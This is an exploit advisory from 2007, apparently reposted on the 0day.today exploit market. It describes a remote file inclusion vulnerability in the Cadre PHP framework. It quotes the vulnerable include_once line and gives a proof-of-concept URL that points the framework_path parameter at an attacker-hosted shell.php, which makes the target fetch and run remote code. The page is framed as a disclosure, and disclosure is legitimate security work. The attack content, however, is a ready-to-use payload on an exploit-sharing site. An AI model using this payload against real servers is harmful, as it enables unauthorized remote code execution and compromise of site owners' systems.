[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Cadre PHP Framework Remote File Include Vulnerability

Author
y3dips
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1454
Category
web applications
Date add
31-01-2007
Platform
unsorted
=====================================================
Cadre PHP Framework Remote File Include Vulnerability
=====================================================




____________________   ___ ___ ________
\_   _____/\_   ___ \ /   |   \\_____  \
 |    __)_ /    \  \//    ~    \/   |   \
 |        \\     \___\    Y    /    |    \
/_______  / \______  /\___|_  /\_______  /
        \/         \/       \/         \/                              .OR.ID
ECHO_ADV_63$2007

------------------------------------------------------------------------------------
[ECHO_ADV_63$2007] Cadre remote file inclusion
------------------------------------------------------------------------------------

Author		: Ahmad Muammar W.K (a.k.a) y3dips
Date Found	: January, 31st 2007
Location	: Indonesia, Jakarta
Critical Lvl	: Critical
------------------------------------------------------------------------------------


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Application   : Cadre
Description   : Cadre is a PHP framework for developing large business applications. 
		It currently supports PostgreSQL as the database back end (although 
		this is extensible). We (Cronosys, LLC) have invested two and a half 
		years in this framework and applications based on this framework.

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~

	---------------class.Quick_Config_Browser.php --------------------
	...
	include_once($GLOBALS[config][framework_path] . "class.Browser.php");
	...
	------------------------------------------------------------------


	An attacker can exploit this vulnerability with a simple php injection script.

Poc/Exploit:
~~~~~~~~

http://target/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=http://attacker/shell.php?

---------------------------------------------------------------------------
Shoutz:
~~~
~ my lovely ana
~ k-159 (my greatest brotha), the_day (young evil thinker), and all echo staff



#  0day.today [2024-10-06]  #